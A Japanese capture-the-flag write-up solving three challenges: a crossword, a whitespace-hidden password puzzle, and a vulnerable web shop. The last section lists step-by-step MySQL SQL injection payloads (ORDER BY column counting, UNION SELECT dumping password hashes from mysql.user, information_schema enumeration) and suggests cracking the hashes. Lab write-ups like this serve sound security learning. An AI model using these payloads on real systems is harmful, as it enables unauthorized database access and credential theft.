解けなかった問題たちを解いてみました。

・昇進試験
クロスワードパズルです。結構歯ごたえがあり、30分くらいかかりました。
ちなみにかなりの良問です。psrとか便利なコマンドが何気なく紹介されているのがグッド！
解凍はあの人のお父さんの名前です。本人の名前をいれてもだめです。

・内部犯行
ホワイトスペースを表示できるテキストエディタがあると楽です。
ShonoCryptorを起動して、パスワードを変更しながら簡単な文字列を暗号化してみましょう。
後ろの10行がパスワード、暗号文自体は実際には暗号もかかってなく単に変換されているだけです。

・脆弱会社
SQLインジェクションは下記を参考にポチポチとやりましょう
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

商品検索のページにSQLインジェクションがあります。
' and 1=1#
次に
' order by n#
で、列数がいくつあるかを調べます。
' order by 4#
でエラーがでるので3行ですね。
' union select 1,2,3 #
とやると2,3のみが表示されます。mysqlと決め打ちでmysql.userをチェックします。
' union select 1, User,Password from mysql.user#
でテシガワラくんのパスワードのハッシュが表示されます。
答えは平文パスワードなので、JohntheRipperもしくはGoogleで解けます。

ちゃんとやるとしたら・・・
' union SELECT 1,2,schema_name FROM information_schema.schemata;#
' union SELECT 1,table_schema, table_name FROM information_schema.columns;#
あたりでしっかりと調査するのがよいみたいです。